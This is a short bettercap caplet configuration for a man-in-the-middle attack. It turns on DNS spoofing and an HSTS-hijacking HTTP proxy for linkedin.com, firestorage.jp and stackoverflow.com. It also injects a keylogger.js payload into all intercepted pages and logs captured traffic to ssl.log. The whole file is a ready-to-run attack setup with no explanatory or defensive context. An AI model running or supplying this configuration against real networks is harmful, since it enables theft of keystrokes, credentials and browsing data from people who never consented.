set hstshijack.log             /usr/share/bettercap/caplets/hstshijack/ssl.log
set hstshijack.ignore          *
set hstshijack.targets         linkedin.com,*.linkedin.com,firestorage.jp,*.firestorage.jp,stackoverflow.com,*.stackoverflow.com
set hstshijack.replacements    linkedin.com,*.linkedin.com,firestorage.jp,*.firestorage.jp,stackoverflow.com,*.stackoverflow.com
set hstshijack.obfuscate       false
set hstshijack.encode          false
set hstshijack.payloads        *:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js


set http.proxy.script  /usr/share/bettercap/caplets/hstshijack/hstshijack.js
set dns.spoof.domains  linkedin.com,*.linkedin.com,firestorage.jp,*.firestorage.jp,stackoverflow.com,*.stackoverflow.com

http.proxy  on
dns.spoof   on
